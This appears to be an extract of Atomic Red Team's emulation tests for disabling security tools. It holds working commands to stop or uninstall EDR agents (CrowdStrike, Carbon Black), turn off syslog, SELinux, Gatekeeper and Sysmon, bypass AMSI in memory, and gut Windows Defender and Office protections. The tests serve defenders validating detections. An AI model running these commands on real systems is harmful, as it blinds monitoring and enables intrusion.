Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
-
Atomic Test #9 - Stop and unload Crowdstrike Falcon on macOS
-
Atomic Test #13 - AMSI Bypass - Remove AMSI Provider Reg Key
-
Atomic Test #14 - Disable Arbitrary Security Windows Service
-
Atomic Test #15 - Tamper with Windows Defender ATP PowerShell
-
Atomic Test #16 - Tamper with Windows Defender Command Prompt
-
Atomic Test #18 - Disable Microsoft Office Security Features
-
Atomic Test #20 - Stop and Remove Arbitrary Security Windows Service
-
Atomic Test #22 - Tamper with Windows Defender Evade Scanning -Folder
-
Atomic Test #23 - Tamper with Windows Defender Evade Scanning -Extension
-
Atomic Test #24 - Tamper with Windows Defender Evade Scanning -Process
Disables syslog collection
Supported Platforms: Linux
auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8
Name | Description | Type | Default Value |
---|---|---|---|
package_checker | Package checking command for linux. Default rpm | string | rpm -q rsyslog |
package_installer | Package installer command for linux. Default yum | string | yum install -y rsyslog |
flavor_command | Command to disable syslog collection. Default newer rsyslog commands. i.e older command = service rsyslog stop ; chkconfig off rsyslog | String | systemctl stop rsyslog ; systemctl disable rsyslog |
cleanup_command | Command to enable syslog collection. Default newer rsyslog commands. i.e older command = service rsyslog start ; chkconfig rsyslog on | String | systemctl start rsyslog ; systemctl enable rsyslog |
#{flavor_command}
#{cleanup_command}
if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
sudo #{package_installer}
Disable the Cb Response service
Supported Platforms: Linux
auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service cbdaemon stop
chkconfig off cbdaemon
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
systemctl stop cbdaemon
systemctl disable cbdaemon
fi
Disables SELinux enforcement
Supported Platforms: Linux
auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8
setenforce 0
setenforce 1
Stop and disable Crowdstrike Falcon on Linux
Supported Platforms: Linux
auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d
sudo systemctl stop falcon-sensor.service
sudo systemctl disable falcon-sensor.service
sudo systemctl enable falcon-sensor.service
sudo systemctl start falcon-sensor.service
Disables Carbon Black Response
Supported Platforms: macOS
auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
Disables LittleSnitch
Supported Platforms: macOS
auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
Disables OpenDNS Umbrella
Supported Platforms: macOS
auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
Disables macOS Gatekeeper
Supported Platforms: macOS
auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053
sudo spctl --master-disable
sudo spctl --master-enable
Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS
Supported Platforms: macOS
auto_generated_guid: b3e7510c-2d4c-4249-a33f-591a2bc83eef
Name | Description | Type | Default Value |
---|---|---|---|
falcond_plist | The path of the Crowdstrike Falcon plist file | path | /Library/LaunchDaemons/com.crowdstrike.falcond.plist |
userdaemon_plist | The path of the Crowdstrike Userdaemon plist file | path | /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist |
sudo launchctl unload #{falcond_plist}
sudo launchctl unload #{userdaemon_plist}
sudo launchctl load -w #{falcond_plist}
sudo launchctl load -w #{userdaemon_plist}
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution, run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".
Supported Platforms: Windows
auto_generated_guid: 811b3e76-c41b-430c-ac0d-e2380bfaa164
Name | Description | Type | Default Value |
---|---|---|---|
sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv |
fltmc.exe unload #{sysmon_driver}
sysmon -u -i > nul 2>&1
sysmon -i -accepteula -i > nul 2>&1
%temp%\Sysmon\sysmon.exe -u > nul 2>&1
%temp%\Sysmon\sysmon.exe -accepteula -i > nul 2>&1
if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 }
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip"
Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force
Remove-Item $env:TEMP\Sysmon.zip -Force
if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }
if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
{ Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i}
if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 }
sysmon -u
sysmon -accepteula -i
Uninstall Sysinternals Sysmon for Defense Evasion
Supported Platforms: Windows
auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc
Name | Description | Type | Default Value |
---|---|---|---|
sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | Path | PathToAtomicsFolder\T1562.001\bin\sysmon.exe |
sysmon -u
sysmon -i -accepteula >nul 2>&1
if(cmd /c where sysmon) {exit 0} else {exit 1}
$parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath
if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
if(cmd /c sc query sysmon) { exit 0} else { exit 1}
cmd /c sysmon -i -accepteula
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. Upon execution, no output is displayed.
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
Supported Platforms: Windows
auto_generated_guid: 695eed40-e949-40e5-b306-b4031e4154bd
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. This test removes the Windows Defender provider registry key. Upon execution, no output is displayed. Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" to verify that it is gone.
Supported Platforms: Windows
auto_generated_guid: 13f09b91-c953-438e-845b-b585e51cac9b
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null
With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed. Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service. To verify that the service has stopped, run "sc query McAfeeDLPAgentService"
Supported Platforms: Windows
auto_generated_guid: a1230893-56ac-4c81-b644-2108e982f8f5
Name | Description | Type | Default Value |
---|---|---|---|
service_name | The name of the service to stop | String | McAfeeDLPAgentService |
net.exe stop #{service_name}
sc.exe config #{service_name} start= disabled
sc.exe config #{service_name} start= auto >nul 2>&1
net.exe start #{service_name} >nul 2>&1
Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled in Windows settings.
Supported Platforms: Windows
auto_generated_guid: 6b8df440-51ec-4d53-bf83-899591c9b5d7
Set-MpPreference -DisableRealtimeMonitoring 1
Set-MpPreference -DisableBehaviorMonitoring 1
Set-MpPreference -DisableScriptScanning 1
Set-MpPreference -DisableBlockAtFirstSeen 1
Set-MpPreference -DisableRealtimeMonitoring 0
Set-MpPreference -DisableBehaviorMonitoring 0
Set-MpPreference -DisableScriptScanning 0
Set-MpPreference -DisableBlockAtFirstSeen 0
Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator. However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied" will be displayed twice and the WinDefend service status will be displayed.
Supported Platforms: Windows
auto_generated_guid: aa875ed4-8935-47e2-b2c5-6ec00ab220d2
sc stop WinDefend
sc config WinDefend start=disabled
sc query WinDefend
sc start WinDefend >nul 2>&1
sc config WinDefend start=enabled >nul 2>&1
Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be grayed out and have no info.
Supported Platforms: Windows
auto_generated_guid: 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0
Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not show any warning before editing the document.
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
Supported Platforms: Windows
auto_generated_guid: 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableInternetFilesInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableUnsafeLocationsInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableAttachementsInPV" -Value "1" -PropertyType "Dword"
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -ErrorAction Ignore | Out-Null
Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -ErrorAction Ignore
Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the command will say completed.
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
Supported Platforms: Windows
auto_generated_guid: 3d47daaa-2f56-43e0-94cc-caf5d8d52a68
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.
Supported Platforms: Windows
auto_generated_guid: ae753dda-0f15-4af6-a168-b9ba16143143
Name | Description | Type | Default Value |
---|---|---|---|
service_name | The name of the service to remove | String | McAfeeDLPAgentService |
Stop-Service -Name #{service_name}
Remove-Service -Name #{service_name}
Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller.
Supported Platforms: Windows
auto_generated_guid: b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297
Name | Description | Type | Default Value |
---|---|---|---|
falcond_path | The Crowdstrike Windows Sensor path. The Guid always changes. | path | C:\ProgramData\Package Cache\{7489ba93-b668-447f-8401-7e57a6fe538d}\WindowsSensor.exe |
if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}}
Malware can exclude a specific path from being scanned and evading detection. Upon successul execution, the file provided should be on the list of excluded path. To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath
Supported Platforms: Windows
auto_generated_guid: 0b19f4ee-de90-4059-88cb-63c800c683ed
Name | Description | Type | Default Value |
---|---|---|---|
excluded_folder | This folder will be excluded from scanning | String | C:\Temp |
$excludedpath= "#{excluded_folder}"
Add-MpPreference -ExclusionPath $excludedpath
$excludedpath= "#{excluded_folder}"
Remove-MpPreference -ExclusionPath $excludedpath
Malware can exclude specific extensions from being scanned and evading detection. Upon successful execution, the extension(s) should be on the list of excluded extensions. To check the exclusion list using poweshell (Get-MpPreference).ExclusionExtension.
Supported Platforms: Windows
auto_generated_guid: 315f4be6-2240-4552-b3e1-d1047f5eecea
Name | Description | Type | Default Value |
---|---|---|---|
excluded_exts | A list of extension to exclude from scanning | string | .exe |
$excludedExts= "#{excluded_exts}"
Add-MpPreference -ExclusionExtension $excludedExts
$excludedExts= "#{excluded_exts}"
Remove-MpPreference -ExclusionExtension $excludedExts -ErrorAction Ignore
Malware can exclude specific processes from being scanned and evading detection. Upon successful execution, the process(es) should be on the list of excluded processes. To check the exclusion list using poweshell (Get-MpPreference).ExclusionProcess."
Supported Platforms: Windows
auto_generated_guid: a123ce6a-3916-45d6-ba9c-7d4081315c27
Name | Description | Type | Default Value |
---|---|---|---|
excluded_process | A list of processes to exclude from scanning | string | outlook.exe |
$excludedProcess = "#{excluded_process}"
Add-MpPreference -ExclusionProcess $excludedProcess
$excludedProcess = "#{excluded_process}"
Remove-MpPreference -ExclusionProcess $excludedProcess